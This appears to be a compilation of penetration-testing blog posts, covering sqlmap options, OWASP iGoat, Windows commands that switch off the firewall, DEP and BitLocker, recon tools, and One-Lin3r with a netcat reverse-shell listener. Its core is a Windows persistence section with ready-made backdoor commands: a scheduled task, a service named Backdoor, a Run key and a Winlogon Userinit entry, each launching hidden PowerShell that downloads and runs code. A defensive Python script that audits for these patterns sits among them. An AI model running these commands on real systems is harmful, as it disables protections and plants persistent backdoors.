    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap
  Miscellaneous:
    These options do not fit into any other category
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS protection
    --list-tampers      Display list of available tamper scripts
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

More can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage



iGoat – A Learning Tool for iOS App Pentesting and Security (Open Web Application Security Project – OWASP)

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.) and mobile app pentesters. It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

  1. Brief introduction to the problem.
  2. Verify the problem by exploiting it.
  3. Brief description of available remediations to the problem.
  4. Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don’t know how to fix a specific problem.

Vulnerabilities Covered (version 3.0):

  • Key Management
    • Hardcoded Encryption Keys
    • Key Storage Server Side
    • Random Key Generation
  • URL Scheme Attack
  • Social Engineering
  • Reverse Engineering
    • String Analysis
  • Data Protection (Rest)
    • Local Data Storage (SQLite)
    • Plist Storage
    • Keychain Usage
    • NSUserDefaults Storage
  • Data Protection (Transit)
    • Server Communication
    • Public Key Pinning
  • Authentication
    • Remote Authentication
  • Side Channel Data Leaks
    • Device Logs
    • Cut-and-Paste
    • Backgrounding
    • Keystroke Logging
  • Tampering
    • Method Swizzling
  • Injection Flaws
    • SQL Injection
    • Cross Site Scripting
  • Broken Cryptography

More on: https://github.com/owasp/igoat

Windows Operating System Penetration – Disable security measures via commands

We must have obtained administrator privileges first; the following commands are then executed from an elevated (administrator) prompt.

  • Disable built-in firewall
netsh advfirewall set allprofiles state off
Disable Windows firewall

  • Disable Windows Defender (via the sc stop or net stop command, or via the registry)

  • Disable DEP
bcdedit.exe /set {current} nx AlwaysOff 

  • Disable Bitlocker
manage-bde -off C:

(Use the following command to check the BitLocker status)

manage-bde -status C:

A tool for DNS Recon, Brute Forcer, Email Enumeration etc. – Bluto

DNS Recon | Brute Forcer | DNS Zone Transfer | DNS Wild Card Checks | DNS Wild Card Brute Forcer | Email Enumeration | Staff Enumeration | Compromised Account Enumeration | MetaData Harvesting


Pip Install Instructions

Note: To test whether pip is already installed, execute:

pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.

curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions

(1) Once pip has successfully downloaded and installed, we can install Bluto:

sudo pip install bluto

(2) You should now be able to execute ‘bluto’ from any working directory in any terminal.


Upgrade Instructions

(1) The upgrade process is as simple as:

sudo pip install bluto --upgrade


Common ways of maintaining privilege/access in Windows: backdoors and fileless backdoors

In order to protect a system from intrusion, we need to understand how attackers maintain privilege and access (persistence) after the initial compromise.

Windows Task Scheduler

Use the Windows Task Scheduler to launch recurring tasks such as scripts, software, etc.

schtasks /create /sc minute /mo 1 /tn "Update Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"\"\"\"))\""

Note: When executed in the command prompt, single quotes are replaced by double quotes, so here we use three double quotes.

This script will launch every minute.

Windows Task Scheduler

Autostart Service

sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(''))\""
sc description Backdoor "Backdoor Test"        //Description for the service
sc config Backdoor start= auto                //Make it auto-start
net start Backdoor                            //Start the service
Windows Services


We can also utilize the “Persistence” module from “PowerSploit”:

Import-Module .\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '1 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose


Add the backdoor path to an auto-run key to start the backdoor at system boot.

Common auto-start keys

# Run Key
# Winlogon\Userinit Key

(There are many other similar keys related to auto-start)

Use the following command to create a fileless backdoor in the Run key:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "KeyNameBackdoor" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(''))\"" /f

Logon Scripts Backdoor

Registry path:


Create string key:


Set the value to the absolute path:


userinit Fileless Backdoor

At logon, Winlogon runs the program(s) specified in this value; programs can be added to or removed from the list.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
 "Userinit"="C:\Windows\system32\userinit.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(''))\""
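The scheduled task, Run key and Winlogon Userinit entries above all share the same command-line shape: a hidden PowerShell window, no profile, and an Invoke-Expression of a string fetched with Net.WebClient. The following Python script is an added, defender-side example (not code from the original post or from any of the tools it mentions) that audits those autostart locations for exactly that shape. It parses constructed sample text in the style of `reg query` and `schtasks /query /fo LIST /v` output; the sample values, host name and task names are made up for the example, and the indicator regexes are assumptions drawn from the command lines on this page.

```python
"""Audit Windows autostart data for the persistence patterns discussed above.

Added example, not code from the original post. It parses constructed sample
text in the style of `reg query` and `schtasks /query /fo LIST /v` output and
flags command lines carrying the indicators the post's backdoors share.
"""
import re
from dataclasses import dataclass, field

# Indicators drawn from the command lines in the post: hidden PowerShell window,
# no profile, Invoke-Expression of a string fetched with Net.WebClient.
INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download-cradle": re.compile(r"net\.webclient|downloadstring", re.I),
}


@dataclass
class AutostartEntry:
    location: str  # registry key path, or "Scheduled Task"
    name: str      # registry value name or task name
    command: str   # command line that would run
    hits: list = field(default_factory=list)


def parse_reg_query(text):
    """Parse `reg query` output: a key line followed by indented value lines."""
    entries, key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            key = line.strip()  # an unindented line is the key path
            continue
        m = re.match(r"^\s+(.+?)\s{2,}(REG_\w+)\s+(.*)$", line)
        if m and key:
            entries.append(AutostartEntry(key, m.group(1), m.group(3).strip()))
    return entries


def parse_schtasks_list(text):
    """Parse `schtasks /query /fo LIST /v` output into entries."""
    entries, task = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "TaskName":
            task = value
        elif key == "Task To Run" and task:
            entries.append(AutostartEntry("Scheduled Task", task, value))
    return entries


def userinit_extra_programs(entry):
    """The Winlogon Userinit value should list only userinit.exe; return anything else."""
    if not (entry.location.lower().endswith("\\winlogon")
            and entry.name.lower() == "userinit"):
        return []
    programs = [p.strip() for p in entry.command.split(",") if p.strip()]
    return [p for p in programs if not p.lower().endswith("userinit.exe")]


def audit(entries):
    """Attach indicator hits to each entry and return the flagged ones."""
    flagged = []
    for e in entries:
        e.hits = [n for n, rx in INDICATORS.items() if rx.search(e.command)]
        extra = userinit_extra_programs(e)
        if extra:
            e.hits.append("userinit-extra-program: " + "; ".join(extra))
        if e.hits:
            flagged.append(e)
    return flagged


# Constructed sample output mirroring the Run key and Userinit values above.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    KeyNameBackdoor    REG_SZ    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"
    Shell    REG_SZ    explorer.exe
"""

# Constructed sample output mirroring the scheduled task created above.
SAMPLE_TASKS = r"""
TaskName:      \Update Script
Task To Run:   powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"
Schedule Type: One Time Only, Minute

TaskName:      \Microsoft\Windows\Defrag\ScheduledDefrag
Task To Run:   %windir%\system32\defrag.exe -c -h -o
Schedule Type: Weekly
"""

if __name__ == "__main__":
    for e in audit(parse_reg_query(SAMPLE_REG) + parse_schtasks_list(SAMPLE_TASKS)):
        print(f"[!] {e.location} :: {e.name}")
        for h in e.hits:
            print(f"      {h}")
```

On a live host the same parsers can be fed the real output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"`, `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` and `schtasks /query /fo LIST /v`; the benign SecurityHealth, Shell and defrag entries in the sample are there to show that ordinary autostarts are not flagged, while the Userinit check catches an appended program even if its command line used none of the keyword indicators.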

Group Policy logon script

Run -> gpedit.msc -> User Configuration -> Scripts (Logon/Logoff)

Windows Local Group Policy Editor

Note: Must use full path e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

DLL Hijacking

If a process tries to load a DLL without an absolute path, Windows looks for the DLL in a defined sequence of folders. If one of those folders can be modified by the attacker, a malicious DLL placed there will be loaded and its code executed.

A common example is LPK.dll.

Windows 7 and later added KnownDLLs protection; add LPK.dll to the following registry key to enable the DLL hijacking


Create String type of Key name it


Set the value to


COM hijacking

The key is to create the correct DLL and choose the right CLSID; by changing the CLSID key value in the registry, CAccPropServicesClass hijacking and MMDeviceEnumerator hijacking can be carried out.
Many system processes invoke these objects when starting. This can bypass the auto-start checks of Autoruns.

Remote Control, Remote Access Trojan (RAT)

A RAT is a type of malicious program that plants backdoors on victims’ devices. It usually propagates through ordinary client channels, e.g. email attachments, game programs, etc. Attackers use compromised client devices to spread the RAT further and eventually build a botnet.

To keep a system safe from backdoors, we need to be able to investigate intrusions, keep the system up to date, and check server security regularly.

One-Lin3r – Penetration test with one line (Installation on Kali Linux)

One-Lin3r is a simple, modular and lightweight framework that gives you all the one-liners you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally, with a lot of new features to make all of this fully automated (e.g. you won’t even need to copy the one-liners).

One-liner function    What this function refers to
Reverse Shell         Various methods and commands to give you a reverse shell.
PrivEsc               Many commands to help in enumeration and privilege escalation.
Bind Shell            Various methods and commands to give you a bind shell.
Dropper               Many ways to download and execute various payload types with various methods.

Install on Kali Linux

1 Launch terminal

2 Install One-Lin3r

~# pip3 install one-lin3r
Install One-Lin3r

3 Force reinstall “prompt-toolkit”

~# pip3 install prompt-toolkit --force-reinstall
Kali Linux - pip3 install prompt-toolkit --force-reinstall

Otherwise we get the following error when launching “one-lin3r -h” straight away without reinstalling “prompt-toolkit”:

Traceback (most recent call last):
  File "/usr/local/bin/one-lin3r", line 6, in <module>
    from one_lin3r.main import main
  File "/usr/local/lib/python3.7/dist-packages/one_lin3r/main.py", line 3, in <module>
    from .core import Cli
  File "/usr/local/lib/python3.7/dist-packages/one_lin3r/core/Cli.py", line 6, in <module>
    from . import utils,db
  File "/usr/local/lib/python3.7/dist-packages/one_lin3r/core/utils.py", line 5, in <module>
    from prompt_toolkit.shortcuts import CompleteStyle, prompt
ImportError: cannot import name 'CompleteStyle' from 'prompt_toolkit.shortcuts' (/usr/lib/python3/dist-packages/prompt_toolkit/shortcuts.py)
Kali Linux, one-lin3r -h error

4 Try launching one-lin3r -h

~# one-lin3r -h
Kali Linux - one-lin3r -h

5 Now we can close the terminal window and launch it from the terminal or from the menu

one-lin3r from menu
one-lin3r from terminal



~# one-lin3r
one-lin3r from terminal

Other commands

One-Lin3r  -> list
usage: one-lin3r [-h] [-r R] [-x X] [-q]
 optional arguments:
   -h, --help  show this help message and exit
   -r          Execute a resource file (history file).
   -x          Execute a specific command (use ; for multiples).
   -q          Quiet mode (no banner).

More on: github.com/D4Vinci/One-Lin3r


Next we can use nc to listen on the port for the reverse connection (reverse shell):

~# nc -lvp 1500
listening on [any] 1500 …
 nc -lvp 1500

Once we are connected to the victim, we need to think about privilege escalation; One-Lin3r also contains some handy privesc commands for us to generate and use.

one-lin3r -> search windows privesc